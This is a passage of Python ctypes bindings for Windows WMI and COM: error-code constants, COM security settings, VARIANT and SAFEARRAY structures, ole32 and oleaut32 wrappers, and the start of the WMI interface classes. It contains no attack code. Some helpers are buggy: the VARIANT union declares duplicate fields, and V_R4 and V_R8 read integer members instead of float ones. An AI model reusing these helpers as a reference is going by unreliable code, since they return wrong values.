WBEM_E_VETO_PUT = 0x8004107a
WBEM_E_INVALID_LOCALE = 0x80041080
WBEM_E_PROVIDER_SUSPENDED = 0x80041081
WBEM_E_SYNCHRONIZATION_REQUIRED = 0x80041082
WBEM_E_NO_SCHEMA = 0x80041083
WBEM_E_PROVIDER_ALREADY_REGISTERED = 0x80041084
WBEM_E_PROVIDER_NOT_REGISTERED = 0x80041085
WBEM_E_FATAL_TRANSPORT_ERROR = 0x80041086
WBEM_E_ENCRYPTED_CONNECTION_REQUIRED = 0x80041087
WBEM_E_PROVIDER_TIMED_OUT = 0x80041088
WBEM_E_NO_KEY = 0x80041089
WBEM_E_PROVIDER_DISABLED = 0x8004108a
WBEMESS_E_REGISTRATION_TOO_BROAD = 0x80042001
WBEMESS_E_REGISTRATION_TOO_PRECISE = 0x80042002
WBEMESS_E_AUTHZ_NOT_PRIVILEGED = 0x80042003
WBEMMOF_E_EXPECTED_QUALIFIER_NAME = 0x80044001
WBEMMOF_E_EXPECTED_SEMI = 0x80044002
WBEMMOF_E_EXPECTED_OPEN_BRACE = 0x80044003
WBEMMOF_E_EXPECTED_CLOSE_BRACE = 0x80044004
WBEMMOF_E_EXPECTED_CLOSE_BRACKET = 0x80044005
WBEMMOF_E_EXPECTED_CLOSE_PAREN = 0x80044006
WBEMMOF_E_ILLEGAL_CONSTANT_VALUE = 0x80044007
WBEMMOF_E_EXPECTED_TYPE_IDENTIFIER = 0x80044008
WBEMMOF_E_EXPECTED_OPEN_PAREN = 0x80044009
WBEMMOF_E_UNRECOGNIZED_TOKEN = 0x8004400a
WBEMMOF_E_UNRECOGNIZED_TYPE = 0x8004400b
WBEMMOF_E_EXPECTED_PROPERTY_NAME = 0x8004400c
WBEMMOF_E_TYPEDEF_NOT_SUPPORTED = 0x8004400d
WBEMMOF_E_UNEXPECTED_ALIAS = 0x8004400e
WBEMMOF_E_UNEXPECTED_ARRAY_INIT = 0x8004400f
WBEMMOF_E_INVALID_AMENDMENT_SYNTAX = 0x80044010
WBEMMOF_E_INVALID_DUPLICATE_AMENDMENT = 0x80044011
WBEMMOF_E_INVALID_PRAGMA = 0x80044012
WBEMMOF_E_INVALID_NAMESPACE_SYNTAX = 0x80044013
WBEMMOF_E_EXPECTED_CLASS_NAME = 0x80044014
WBEMMOF_E_TYPE_MISMATCH = 0x80044015
WBEMMOF_E_EXPECTED_ALIAS_NAME = 0x80044016
WBEMMOF_E_INVALID_CLASS_DECLARATION = 0x80044017
WBEMMOF_E_INVALID_INSTANCE_DECLARATION = 0x80044018
WBEMMOF_E_EXPECTED_DOLLAR = 0x80044019
WBEMMOF_E_CIMTYPE_QUALIFIER = 0x8004401a
WBEMMOF_E_DUPLICATE_PROPERTY = 0x8004401b
WBEMMOF_E_INVALID_NAMESPACE_SPECIFICATION = 0x8004401c
WBEMMOF_E_OUT_OF_RANGE = 0x8004401d
WBEMMOF_E_INVALID_FILE = 0x8004401e
WBEMMOF_E_ALIASES_IN_EMBEDDED = 0x8004401f
WBEMMOF_E_NULL_ARRAY_ELEM = 0x80044020
WBEMMOF_E_DUPLICATE_QUALIFIER = 0x80044021
WBEMMOF_E_EXPECTED_FLAVOR_TYPE = 0x80044022
WBEMMOF_E_INCOMPATIBLE_FLAVOR_TYPES = 0x80044023
WBEMMOF_E_MULTIPLE_ALIASES = 0x80044024
WBEMMOF_E_INCOMPATIBLE_FLAVOR_TYPES2 = 0x80044025
WBEMMOF_E_NO_ARRAYS_RETURNED = 0x80044026
WBEMMOF_E_MUST_BE_IN_OR_OUT = 0x80044027
WBEMMOF_E_INVALID_FLAGS_SYNTAX = 0x80044028
WBEMMOF_E_EXPECTED_BRACE_OR_BAD_TYPE = 0x80044029
WBEMMOF_E_UNSUPPORTED_CIMV22_QUAL_VALUE = 0x8004402a
WBEMMOF_E_UNSUPPORTED_CIMV22_DATA_TYPE = 0x8004402b
WBEMMOF_E_INVALID_DELETEINSTANCE_SYNTAX = 0x8004402c
WBEMMOF_E_INVALID_QUALIFIER_SYNTAX = 0x8004402d
WBEMMOF_E_QUALIFIER_USED_OUTSIDE_SCOPE = 0x8004402e
WBEMMOF_E_ERROR_CREATING_TEMP_FILE = 0x8004402f
WBEMMOF_E_ERROR_INVALID_INCLUDE_FILE = 0x80044030
WBEMMOF_E_INVALID_DELETECLASS_SYNTAX = 0x80044031
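# The WBEM_S_*, WBEM_E_*, WBEMESS_E_* and WBEMMOF_E_* values above are the WMI
# HRESULT status/error codes; failing calls surface them through
# RAISE_NON_ZERO_ERR below as ctypes.WinError exceptions.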
EOAC_NONE = 0
EOAC_MUTUAL_AUTH = 0x1
EOAC_STATIC_CLOAKING = 0x20
EOAC_DYNAMIC_CLOAKING = 0x40
EOAC_ANY_AUTHORITY = 0x80
EOAC_MAKE_FULLSIC = 0x100
EOAC_DEFAULT = 0x800
EOAC_SECURE_REFS = 0x2
EOAC_ACCESS_CONTROL = 0x4
EOAC_APPID = 0x8
EOAC_DYNAMIC = 0x10
EOAC_REQUIRE_FULLSIC = 0x200
EOAC_AUTO_IMPERSONATE = 0x400
EOAC_NO_CUSTOM_MARSHAL = 0x2000
EOAC_DISABLE_AAA = 0x1000
RPC_C_IMP_LEVEL_DEFAULT = 0
RPC_C_IMP_LEVEL_ANONYMOUS = 1
RPC_C_IMP_LEVEL_IDENTIFY = 2
RPC_C_IMP_LEVEL_IMPERSONATE = 3
RPC_C_IMP_LEVEL_DELEGATE = 4
RPC_C_AUTHN_LEVEL_DEFAULT = 0
RPC_C_AUTHN_LEVEL_NONE = 1
RPC_C_AUTHN_LEVEL_CONNECT = 2
RPC_C_AUTHN_LEVEL_CALL = 3
RPC_C_AUTHN_LEVEL_PKT = 4
RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
RPC_C_AUTHN_LEVEL_PKT_PRIVACY = 6
RPC_AUTH_IDENTITY_HANDLE = wintypes.HANDLE
RPC_AUTHZ_HANDLE = wintypes.HANDLE
RPC_C_AUTHN_NONE = 0
RPC_C_AUTHN_DCE_PRIVATE = 1
RPC_C_AUTHN_DCE_PUBLIC = 2
RPC_C_AUTHN_DEC_PUBLIC = 4
RPC_C_AUTHN_GSS_NEGOTIATE = 9
RPC_C_AUTHN_WINNT = 10
RPC_C_AUTHN_GSS_SCHANNEL = 14
RPC_C_AUTHN_GSS_KERBEROS = 16
RPC_C_AUTHN_DPA = 17
RPC_C_AUTHN_MSN = 18
RPC_C_AUTHN_DIGEST = 21
RPC_C_AUTHN_KERNEL = 20
RPC_C_AUTHZ_NONE = 0
RPC_C_AUTHZ_NAME = 1
RPC_C_AUTHZ_DCE = 2
RPC_C_AUTHZ_DEFAULT = 0xffffffff
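# The EOAC_*, RPC_C_IMP_LEVEL_*, RPC_C_AUTHN_* and RPC_C_AUTHZ_* constants are
# the COM security settings consumed by CoInitializeSecurity and
# CoSetProxyBlanket further down in this module.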
VT_EMPTY = 0
VT_NULL = 1
VT_I2 = 2
VT_I4 = 3
VT_R4 = 4
VT_R8 = 5
VT_CY = 6
VT_DATE = 7
VT_BSTR = 8
VT_DISPATCH = 9
VT_ERROR = 10
VT_BOOL = 11
VT_VARIANT = 12
VT_UNKNOWN = 13
VT_DECIMAL = 14
VT_I1 = 16
VT_UI1 = 17
VT_UI2 = 18
VT_UI4 = 19
VT_I8 = 20
VT_UI8 = 21
VT_INT = 22
VT_UINT = 23
VT_VOID = 24
VT_HRESULT = 25
VT_PTR = 26
VT_SAFEARRAY = 27
VT_CARRAY = 28
VT_USERDEFINED = 29
VT_LPSTR = 30
VT_LPWSTR = 31
VT_RECORD = 36
VT_INT_PTR = 37
VT_UINT_PTR = 38
VT_FILETIME = 64
VT_BLOB = 65
VT_STREAM = 66
VT_STORAGE = 67
VT_STREAMED_OBJECT = 68
VT_STORED_OBJECT = 69
VT_BLOB_OBJECT = 70
VT_CF = 71
VT_CLSID = 72
VT_VERSIONED_STREAM = 73
VT_BSTR_BLOB = 0xfff
VT_VECTOR = 0x1000
VT_ARRAY = 0x2000
VT_BYREF = 0x4000
VT_RESERVED = 0x8000
VT_ILLEGAL = 0xffff
VT_ILLEGALMASKED = 0xfff
VT_TYPEMASK = 0xfff
VT_GENERIC = -1
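# VT_* are the VARIANT type tags stored in VARIANT.vt; the V_* helpers and
# V_TO_STR/V_TO_TYPE below dispatch on them to read the matching union member.
# VT_GENERIC (-1) appears to be a module-local catch-all rather than a Windows value.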
VARTYPE = ctypes.c_ushort
class SOLE_AUTHENTICATION_SERVICE(ctypes.Structure):
_fields_ = [
('dwAuthnSvc', wintypes.DWORD),
('dwAuthzSvc', wintypes.DWORD),
('pPrincipalName', wintypes.OLESTR),
('hr', HRESULT)
]
class GUID(ctypes.Structure):
_fields_ = [
('Data1', wintypes.DWORD),
('Data2', wintypes.WORD),
('Data3', wintypes.WORD),
('Data4', wintypes.BYTE * 8),
]
class SECURITY_DESCRIPTOR(ctypes.Structure):
_fields_ = [('Revision', ctypes.c_byte),
('Sbz1', ctypes.c_byte),
('Control', ctypes.c_uint16),
('Owner', ctypes.c_void_p),
('Group', ctypes.c_void_p),
('Sacl', ctypes.c_void_p),
('Dacl', ctypes.c_void_p),
]
class SAFEARRAYBOUND(ctypes.Structure):
_fields_ = [('cElements', wintypes.ULONG),
('lLbound', wintypes.LONG)]
class SAFEARRAY(ctypes.Structure):
_fields_ = [('cDims', wintypes.USHORT),
('fFeatures', wintypes.USHORT),
('cbElements', wintypes.ULONG),
('cLocks', wintypes.ULONG),
('pvData', wintypes.LPVOID),
('rgsabound', ctypes.POINTER(SAFEARRAYBOUND))]
class DECIMAL_DUMMYSTRUCTNAME(ctypes.Structure):
_fields_ = [('scale', wintypes.BYTE),
('sign', wintypes.BYTE)]
class DECIMAL_DUMMYSTRUCTNAME2(ctypes.Structure):
_fields_ = [('Lo32', wintypes.ULONG),
('Mid32', wintypes.ULONG)]
class DECIMAL_DUMMYUNIONNAME(ctypes.Union):
_fields_ = [('DUMMYSTRUCTNAME', DECIMAL_DUMMYSTRUCTNAME),
('signscale', wintypes.USHORT)]
class DECIMAL_DUMMYUNIONNAME2(ctypes.Union):
_fields_ = [('DUMMYSTRUCTNAME2', DECIMAL_DUMMYSTRUCTNAME2),
('Lo64', ctypes.c_ulonglong)]
class DECIMAL(ctypes.Structure):
_fields_ = [('DUMMYUNIONNAME', DECIMAL_DUMMYUNIONNAME),
('Hi32', wintypes.ULONG),
('DUMMYUNIONNAME2', DECIMAL_DUMMYUNIONNAME2)]
class VARIANT__tagBRECORD(ctypes.Structure):
_fields_ = [("pvRecord", wintypes.LPVOID),
("pRecInfo", wintypes.LPVOID)] # IRecordInfo * pRecInfo;
class VARIANT__VARIANT_NAME_3(ctypes.Union):
_fields_ = [("llVal", wintypes.USHORT),
("lVal", wintypes.USHORT),
('llVal', ctypes.c_longlong),
('lVal', wintypes.LONG),
('bVal', wintypes.BYTE),
('iVal', wintypes.SHORT),
('fltVal', wintypes.FLOAT),
('dblVal', wintypes.DOUBLE),
('boolVal', wintypes.VARIANT_BOOL),
('bool', wintypes.VARIANT_BOOL),
('scode', wintypes.LONG),
('cyVal', wintypes.LPVOID), # struct CY
('date', wintypes.DOUBLE),
('bstrVal', BSTR),
('punkVal', wintypes.LPVOID), # IUnknown *
('pdispVal', wintypes.LPVOID), # IDispatch *
('parray', ctypes.POINTER(SAFEARRAY)),
('pbVal', ctypes.POINTER(wintypes.BYTE)),
('piVal', PSHORT),
('plVal', ctypes.POINTER(wintypes.LONG)),
('pllVal', ctypes.POINTER(ctypes.c_longlong)),
('pfltVal', ctypes.POINTER(wintypes.FLOAT)),
('pdblVal', ctypes.POINTER(wintypes.DOUBLE)),
('pboolVal', ctypes.POINTER(wintypes.VARIANT_BOOL)),
('pbool', ctypes.POINTER(wintypes.VARIANT_BOOL)),
('pscode', LPLONG),
('pcyVal', wintypes.LPVOID), # CY *
('pdate', ctypes.POINTER(wintypes.DOUBLE)),
('pbstrVal', ctypes.POINTER(BSTR)),
('ppunkVal', ctypes.POINTER(wintypes.LPVOID)), # IUnknown **
('ppdispVal', ctypes.POINTER(wintypes.LPVOID)), # IDispatch **
('pparray', ctypes.POINTER(ctypes.POINTER(SAFEARRAY))),
('pvarVal', wintypes.LPVOID), # VARIANT*
('byref', wintypes.LPVOID),
('cVal', CHAR),
('uiVal', wintypes.USHORT),
('ulVal', wintypes.ULONG),
('ullVal', ctypes.c_ulonglong),
('intVal', wintypes.INT),
('uintVal', wintypes.UINT),
('pdecVal', ctypes.POINTER(DECIMAL)),
('pcVal', PCHAR),
('puiVal', PUSHORT),
('pulVal', PULONG),
('pullVal', ctypes.POINTER(ctypes.c_ulonglong)),
('pintVal', ctypes.POINTER(wintypes.INT)),
('puintVal', ctypes.POINTER(wintypes.UINT)),
("__VARIANT_NAME_4", VARIANT__tagBRECORD)]
class VARIANT__tagVARIANT(ctypes.Structure):
_fields_ = [("vt", wintypes.USHORT),
("wReserved1", wintypes.WORD),
("wReserved2", wintypes.WORD),
("wReserved3", wintypes.WORD),
("__VARIANT_NAME_3", VARIANT__VARIANT_NAME_3)]
class VARIANT__VARIANT_NAME_1(ctypes.Union):
_fields_ = [("__VARIANT_NAME_2", VARIANT__tagVARIANT),
("decVal", DECIMAL)]
class VARIANT(ctypes.Structure):
_fields_ = [('__VARIANT_NAME_1', VARIANT__VARIANT_NAME_1)]
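# The DECIMAL/VARIANT definitions above mirror the nested unions and structs of
# the oleaut32 VARIANT; the accessor helpers below exist so callers never have
# to spell out the __VARIANT_NAME_* nesting by hand.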
def V_VAR3(X):
return X.__VARIANT_NAME_1.__VARIANT_NAME_2.__VARIANT_NAME_3
def V_VT(X):
return X.__VARIANT_NAME_1.__VARIANT_NAME_2.vt
V_VAR = V_VAR3
def V_EMPTY():
return ''
def V_NULL():
return 'NULL'
def V_BSTR(var):
return convert_bstr_to_str(V_VAR3(var).bstrVal)
def V_BOOL(var):
return V_VAR(var).boolVal
def V_DATE(var):
return V_VAR(var).date
def V_I2(var):
return V_VAR(var).lVal
def V_I4(var):
return V_VAR(var).lVal
def V_I8(var):
return V_VAR(var).llVal
def V_R4(var):
return V_VAR(var).lVal
def V_R8(var):
return V_VAR(var).llVal
def V_GENERIC(var):
return V_VAR(var).byref
def V_TO_STR(var):
ret = ''
vt = V_VT(var)
if vt == VT_EMPTY:
ret = V_EMPTY()
elif vt == VT_NULL:
ret = V_NULL()
elif vt == VT_DATE:
ret = str(V_DATE(var))
elif vt == VT_BSTR:
ret = V_BSTR(var)
elif vt == VT_BOOL:
ret = str(V_BOOL(var))
elif vt == VT_I2:
ret = str(V_I2(var))
elif vt == VT_I4:
ret = str(V_I4(var))
elif vt == VT_I8:
ret = str(V_I8(var))
elif vt == VT_R4:
ret = str(V_R4(var))
elif vt == VT_R8:
ret = str(V_R8(var))
else:
try:
ret = str(V_GENERIC(var))
except:
pass
return ret
def V_TO_VT_DICT(var):
ret = {}
vt = V_VT(var)
if vt == VT_EMPTY:
ret['value'] = V_EMPTY()
elif vt == VT_NULL:
ret['value'] = V_NULL()
elif vt == VT_DATE:
ret['value'] = V_DATE(var)
elif vt == VT_BSTR:
ret['value'] = V_BSTR(var)
elif vt == VT_BOOL:
ret['value'] = V_BOOL(var)
elif vt == VT_I2:
ret['value'] = V_I2(var)
elif vt == VT_I4:
ret['value'] = V_I4(var)
elif vt == VT_I8:
ret['value'] = V_I8(var)
elif vt == VT_R4:
ret['value'] = V_R4(var)
elif vt == VT_R8:
ret['value'] = V_R8(var)
else:
try:
ret['value'] = V_GENERIC(var)
except:
pass
ret['type'] = vt
return ret
def V_TO_TYPE(var):
ret = None
vt = V_VT(var)
if vt == VT_NULL:
ret = V_NULL()
elif vt == VT_DATE:
ret = V_DATE(var)
elif vt == VT_BSTR:
ret = V_BSTR(var)
elif vt == VT_BOOL:
ret = V_BOOL(var)
elif vt == VT_I2:
ret = V_I2(var)
elif vt == VT_I4:
ret = V_I4(var)
elif vt == VT_I8:
ret = V_I8(var)
elif vt == VT_R4:
ret = V_R4(var)
elif vt == VT_R8:
ret = V_R8(var)
else:
try:
ret = V_GENERIC(var)
except:
pass
return ret
def SET_VT(var, vt):
var.__VARIANT_NAME_1.__VARIANT_NAME_2.vt = vt
VARIANTARG = VARIANT
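# Illustrative sketch (not part of the original module): building and reading a
# VT_I4 VARIANT with the helpers defined above.
#   var = VARIANT()
#   VariantInit(var)        # defined below; initializes the VARIANT
#   SET_VT(var, VT_I4)
#   V_VAR(var).lVal = 42
#   assert V_TO_TYPE(var) == 42
#   VariantClear(var)       # defined below; releases any owned resources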
CLSID_WbemLocator = GUID(0x4590f811, 0x1d3a, 0x11d0, (0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24))
IID_IWbemLocator = GUID(0xdc12a687, 0x737f, 0x11cf, (0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24))
ole32 = ctypes.windll.ole32
oleaut32 = ctypes.windll.oleaut32
def RAISE_NON_ZERO_ERR(result, func, args):
if result != 0:
raise ctypes.WinError(result)
return args
def convert_bstr_to_str(bstr):
length = SysStringLen(bstr)
converted_string = str(bstr[:length])
SysFreeString(bstr)
return converted_string
def CoInitializeEx(reserved, co_init):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
wintypes.LPVOID,
wintypes.DWORD
)
paramflags = (
(_In_, 'pvReserved'),
(_In_, 'dwCoInit')
)
_CoInitializeEx = prototype(('CoInitializeEx', ole32), paramflags)
_CoInitializeEx.errcheck = RAISE_NON_ZERO_ERR
return _CoInitializeEx(reserved, co_init)
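# Every wrapper in this module follows the same pattern: build a WINFUNCTYPE
# prototype, describe each parameter as _In_/_Out_ via paramflags, bind it to
# the DLL export by name, and attach RAISE_NON_ZERO_ERR so any failing HRESULT
# is raised as a WinError instead of being returned to the caller.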
def CoUninitialize():
prototype = ctypes.WINFUNCTYPE(
None
)
_CoUninitialize = prototype(('CoUninitialize', ole32))
_CoUninitialize()
def CoCreateInstance(clsid, unk, ctx, iid):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(GUID),
wintypes.LPVOID,
wintypes.DWORD,
ctypes.POINTER(GUID),
ctypes.POINTER(wintypes.LPVOID)
)
paramflags = (
(_In_, 'rclsid'),
(_In_, 'pUnkOuter'),
(_In_, 'dwClsContext'),
(_In_, 'riid'),
(_Out_, 'ppv')
)
_CoCreateInstance = prototype(('CoCreateInstance', ole32), paramflags)
_CoCreateInstance.errcheck = RAISE_NON_ZERO_ERR
return _CoCreateInstance(clsid, unk, ctx, iid)
def CoInitializeSecurity(sec_desc,
c_auth_svc,
as_auth_svc,
reserved1,
auth_level,
imp_level,
auth_list,
capibilities,
reserved3):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SECURITY_DESCRIPTOR),
wintypes.LONG,
ctypes.POINTER(SOLE_AUTHENTICATION_SERVICE),
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.LPVOID
)
paramflags = (
(_In_, 'pSecDesc'),
(_In_, 'cAuthSvc'),
(_In_, 'asAuthSvc'),
(_In_, 'pReserved1'),
(_In_, 'dwAuthnLevel'),
(_In_, 'dwImpLevel'),
(_In_, 'pAuthList'),
(_In_, 'dwCapabilities'),
(_In_, 'pReserved3')
)
_CoInitializeSecurity = prototype(('CoInitializeSecurity', ole32), paramflags)
_CoInitializeSecurity.errcheck = RAISE_NON_ZERO_ERR
return _CoInitializeSecurity(sec_desc,
c_auth_svc,
as_auth_svc,
reserved1,
auth_level,
imp_level,
auth_list,
capibilities,
reserved3)
def CoSetProxyBlanket(proxy,
authn_svc,
authz_svc,
server_p_name,
authn_level,
imp_level,
auth_info,
capabilities):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.OLESTR,
wintypes.DWORD,
wintypes.DWORD,
RPC_AUTH_IDENTITY_HANDLE,
wintypes.DWORD
)
paramflags = (
(_In_, 'pProxy'),
(_In_, 'dwAuthnSvc'),
(_In_, 'dwAuthzSvc'),
(_In_, 'pServerPrincName'),
(_In_, 'dwAuthnLevel'),
(_In_, 'dwImpLevel'),
(_In_, 'pAuthInfo'),
(_In_, 'dwCapabilities')
)
_CoSetProxyBlanket = prototype(('CoSetProxyBlanket', ole32), paramflags)
_CoSetProxyBlanket.errcheck = RAISE_NON_ZERO_ERR
return _CoSetProxyBlanket(proxy,
authn_svc,
authz_svc,
server_p_name,
authn_level,
imp_level,
auth_info,
capabilities)
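# Typical WMI client bootstrap using the wrappers above (sketch only; the
# literal 0 below stands for COINIT_MULTITHREADED, which is not defined in
# this module):
#   CoInitializeEx(None, 0)
#   CoInitializeSecurity(None, -1, None, None,
#                        RPC_C_AUTHN_LEVEL_DEFAULT,
#                        RPC_C_IMP_LEVEL_IMPERSONATE,
#                        None, EOAC_NONE, None)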
def SysAllocString(wstr):
prototype = ctypes.WINFUNCTYPE(
BSTR,
wintypes.LPOLESTR
)
paramflags = (
(_In_, 'psz'),
)
_SysAllocString = prototype(('SysAllocString', oleaut32), paramflags)
return _SysAllocString(wstr)
def SysFreeString(bstr):
prototype = ctypes.WINFUNCTYPE(
None,
BSTR
)
paramflags = (
(_In_, 'bstrString'),
)
_SysFreeString = prototype(('SysFreeString', oleaut32), paramflags)
_SysFreeString(bstr)
def SysStringLen(bstr):
prototype = ctypes.WINFUNCTYPE(
wintypes.UINT,
BSTR
)
paramflags = (
(_In_, 'pbstr'),
)
_SysStringLen = prototype(('SysStringLen', oleaut32), paramflags)
return _SysStringLen(bstr)
def VariantInit(var):
prototype = ctypes.WINFUNCTYPE(
None,
ctypes.POINTER(VARIANTARG)
)
paramflags = (
(_In_, 'pvarg'),
)
_VariantInit = prototype(('VariantInit', oleaut32), paramflags)
_VariantInit(var)
def VariantClear(var):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(VARIANTARG)
)
paramflags = (
(_In_, 'pvarg'),
)
_VariantClear = prototype(('VariantClear', oleaut32), paramflags)
_VariantClear.errcheck = RAISE_NON_ZERO_ERR
return _VariantClear(var)
def SafeArrayCreate(vt, dims, bound):
prototype = ctypes.WINFUNCTYPE(
ctypes.POINTER(SAFEARRAY),
VARTYPE,
wintypes.UINT,
ctypes.POINTER(SAFEARRAYBOUND)
)
paramflags = (
(_In_, 'vt'),
(_In_, 'cDims'),
(_In_, 'rgsabound'),
)
_SafeArrayCreate = prototype(('SafeArrayCreate', oleaut32), paramflags)
return _SafeArrayCreate(vt, dims, bound)
def SafeArrayDestroy(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayDestroy = prototype(('SafeArrayDestroy', oleaut32), paramflags)
_SafeArrayDestroy.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayDestroy(sa)
def SafeArrayLock(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayLock = prototype(('SafeArrayLock', oleaut32), paramflags)
_SafeArrayLock.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayLock(sa)
def SafeArrayUnlock(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayUnlock = prototype(('SafeArrayUnlock', oleaut32), paramflags)
_SafeArrayUnlock.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayUnlock(sa)
def SafeArrayAccessData(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY),
ctypes.POINTER(wintypes.LPVOID)
)
paramflags = (
(_In_, 'psa'),
(_Out_, 'ppvData', ctypes.pointer(wintypes.LPVOID(None))),
)
_SafeArrayAccessData = prototype(('SafeArrayAccessData', oleaut32), paramflags)
_SafeArrayAccessData.errcheck = RAISE_NON_ZERO_ERR
return_obj = _SafeArrayAccessData(sa)
return return_obj.contents
def SafeArrayUnaccessData(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayUnaccessData = prototype(('SafeArrayUnaccessData', oleaut32), paramflags)
_SafeArrayUnaccessData.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayUnaccessData(sa)
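# SAFEARRAYs handed back by the WMI GetNames calls hold BSTR elements; callers
# are expected to pair SafeArrayAccessData/SafeArrayUnaccessData (or
# SafeArrayLock/SafeArrayUnlock) around any direct reads of pvData and to free
# the array with SafeArrayDestroy when done.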
```
#### File: cWMI/cwmi/wmi.py
```python
import ctypes
from ctypes import wintypes
from . import com
from . import winapi
from .wintype import HRESULT, BSTR, CIMTYPE
_In_ = 1
_Out_ = 2
IWbemObjectSink_Indicate_Idx = 3
IWbemObjectSink_SetStatus_Idx = 4
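# _In_/_Out_ mirror the paramflags direction values used in winapi.py, and the
# *_Idx constants are COM vtable slot indices: each method below binds its
# prototype to the interface by ordinal rather than by exported name.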
class IWbemObjectSink(com.IUnknown):
def Indicate(self, object_count, obj_array):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lObjectCount'),
(_In_, 'apObjArray'),
)
_Indicate = prototype(IWbemObjectSink_Indicate_Idx,
'Indicate',
paramflags)
_Indicate.errcheck = winapi.RAISE_NON_ZERO_ERR
_Indicate(self.this,
object_count,
obj_array.this if obj_array else None
)
def SetStatus(self, flags, result, param, obj_param):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
HRESULT,
BSTR,
ctypes.POINTER(IWbemClassObject))
paramflags = ((_In_, 'lFlags'),
(_In_, 'hResult'),
(_In_, 'strParam'),
(_In_, 'pObjParam'),
)
_SetStatus = prototype(IWbemObjectSink_SetStatus_Idx,
'SetStatus',
paramflags)
_SetStatus.errcheck = winapi.RAISE_NON_ZERO_ERR
param_bstr = winapi.SysAllocString(param) if param is not None else None
try:
_SetStatus(self.this,
flags,
result,
param_bstr,
obj_param.this if obj_param else None
)
finally:
if param_bstr is not None:
winapi.SysFreeString(param_bstr)
IWbemQualifierSet_Get_Idx = 3
IWbemQualifierSet_Put_Idx = 4
IWbemQualifierSet_Delete_Idx = 5
IWbemQualifierSet_GetNames_Idx = 6
IWbemQualifierSet_BeginEnumeration_Idx = 7
IWbemQualifierSet_Next_Idx = 8
IWbemQualifierSet_EndEnumeration_Idx = 9
class IWbemQualifierSet(com.IUnknown):
def Get(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'pVal'),
(_Out_, 'plFlavor'),
)
_Get = prototype(IWbemQualifierSet_Get_Idx,
'Get',
paramflags)
_Get.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _Get(self.this,
name,
flags
)
return return_obj, return_obj2
def Put(self, name, val, flavor):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(winapi.VARIANT),
ctypes.c_long)
paramflags = ((_In_, 'wszName'),
(_In_, 'pVal'),
(_In_, 'lFlavor'),
)
_Put = prototype(IWbemQualifierSet_Put_Idx,
'Put',
paramflags)
_Put.errcheck = winapi.RAISE_NON_ZERO_ERR
_Put(self.this,
name,
ctypes.byref(val) if val else None,
flavor
)
def Delete(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'wszName'),
)
_Delete = prototype(IWbemQualifierSet_Delete_Idx,
'Delete',
paramflags)
_Delete.errcheck = winapi.RAISE_NON_ZERO_ERR
_Delete(self.this,
name
)
def GetNames(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pNames'),
)
_GetNames = prototype(IWbemQualifierSet_GetNames_Idx,
'GetNames',
paramflags)
_GetNames.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetNames(self.this,
flags
)
return_obj = ctypes.cast(wintypes.LPVOID(return_obj), ctypes.POINTER(winapi.SAFEARRAY))
return return_obj
def BeginEnumeration(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lFlags'),
)
_BeginEnumeration = prototype(IWbemQualifierSet_BeginEnumeration_Idx,
'BeginEnumeration',
paramflags)
_BeginEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginEnumeration(self.this,
flags
)
def Next(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrName'),
(_Out_, 'pVal'),
(_Out_, 'plFlavor'),
)
_Next = prototype(IWbemQualifierSet_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3 = _Next(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj, return_obj2, return_obj3
def EndEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndEnumeration = prototype(IWbemQualifierSet_EndEnumeration_Idx,
'EndEnumeration',
